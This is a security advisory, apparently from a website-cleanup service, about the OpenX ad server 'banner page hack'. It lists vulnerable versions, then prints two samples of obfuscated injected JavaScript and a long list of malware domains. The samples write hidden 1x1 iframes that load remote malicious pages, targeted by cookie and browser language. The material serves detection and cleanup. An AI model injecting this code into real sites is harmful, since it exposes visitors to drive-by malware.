OpenX Banner Page Hack
Updated: December 20, 2013
The OpenX banner page hack places a malicious JavaScript or Iframe into the banner page (/www/delivery/ajs.php) produced by an OpenX ad server. This is sometimes accomplished with a plugin and in other cases the code is injected into the OpenX database. In some cases the hackers have inserted backdoor scripts, which allow the hacker to remote access to the ad server, into some of the hacked ad servers. Also, in some cases hacker have added additional user accounts to the ad server.
It is possible that ad servers running up to version 3.0.1 are vulnerable (check what version you are currently running), as Revive Adserver 3.0.2 fixed a SQL injection vulnerability that could lead to backend access. Openx has a post with advice on cleaning up after a hack or we can clean up your ad server for you.
Older versions of OpenX contain even more vulnerabilities. Revive Adserver 3.0.0 fixed a code injection exploit. Some downloads of OpenX 2.8.10 contained a remote code execution vulnerability. Both versions 2.8.9 and 2.8.10 were released to address unspecified "recent reported security issues". OpenX warned that 2.8.7 "might be vulnerable to certain attacks and is probably not secure" and OpenX had announced that they patched an undisclosed vulnerability in version 2.8.7. A previous hack infected ad servers in December of 2009 and was patched in version 2.8.3
Recent Code In Append Field:
<script language="JavaScript">var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') <= 0 && dc.cookie.indexOf('1=o') > 0){ function clng(wrd){var cou=new Array('en-us','en-ca','en-au','en-gb','fr-ca','fr','de','es','it');for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;} if(typeof navigator.language == 'undefined'){var nav = navigator.userLanguage} else {var nav = navigator.language;} if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln("<script type=\"text/javascript\"><!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\"http://vrominet.com/ry081q2d52c.php?s=IBB@G\" ';");dc.writeln("document.write('<ifr'+'ame'+host+src+sc+brdr+'></ifra'+'me>');");dc.writeln("//--><\/script>");} var run=1; date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}</script>
Recent Script Format:
if(typeof run == \'undefined\'){dc.writeln(\"<"+"script type=\\\"text/javascript\\\"><"+"!--\");dc.writeln(\"var host=\' widt\'+\'h=1 h\'+\'eight\'+\'=1 \'; var src=\'src=\'; var brdr=\'fra\'+\'mebor\'+\'der=\'+\'0\';var sc=\'\\\"http://frentomst.com/xp/index.php?s=IBB@G\\\" \';\");dc.writeln(\"document.write(\'<"+"ifr\'+\'ame\'+host+src+sc+brdr+\'\\\"><"+"/ifra\'+\'me>\');\");dc.writeln(\"//--><"+"\\/script>\");} var run=1;\n
Recent Malware Domains: blamesslek.com, sircic.com, sirjm.com, asirq.com, cnjug.com, blamesllek.com, bikleman.com, oplayerst.com, kovertums.com, pouiverton.com, frentomst.com, quintivolt.com, opperlant.com, priztersmon.com, polotren.com, juitwell.com, blivvsen.com, biltermos.com, livertip.com, voxinghelt.com, helstrijt.com, binreskolt.com, jewertlins.com, pinterrot.com, voxinghlet.com, noixols.com, kolinrt.com, pceriozc.com, ziniosca.com, serwinlk.com, plizzerc.com, qerwill.com, oltinder.com, pllistrev.com, nowelrsa.com, volintrex.com, esitolvarx.com, xezolpent.com, vionterxz.com, volinsat.com, opletrin.com, opertyvaz.com, lakeltis.com, xepzart.com, aseoplent.com, sedralion.com, ointyrlez.com, exleftt.com, apolint.com, becerinklot.com, evretsan.com, olpentrin.com, solinberitt.com, inubuts.com, ploztex.com, azopnet.com, jablesst.com, bkbbkab.co.cc, inerbazt.com, restybl.com, werusna.com, seberfalm.com, wliontreh.com, bkbkzbk.co.cc, cerbingh.com, bultropas.com, oplandus.com, bovonkls.com, vermuzby.com, efertyon.com, noislotik.com, vuntrempy.com, empyrtemp.com, ubinseros.com, vokomatry.com, uberfalsz.com, culsis.com, basesis.com, culassure.com, optima68.ipq.co, susiwong.com, clickme10.ipq.co, globax668.ipq.co, isanghyun.com, yenguide.com, mykasker.com, ahkertson.com, vrominet.com, opiontol.com, ahsontul.com, mutterfas.com, zeversans.com, leofloter.com, binoquils.com, mleoziber.com, ensortlem.com, finremtsog.com, unjaysmilf.com, forminteld.com, nolemoitos.com, enbindeft.com, ulumagherm.com, zvidterms.com, zibendelt.com, unoghoster.com, smerftond.com, unglebdirt.com, finofalts.com, bringodel.com, parti03.co.cc, parti38.co.cc, parti01.co.cc, frepogolt.com, asperfalt.com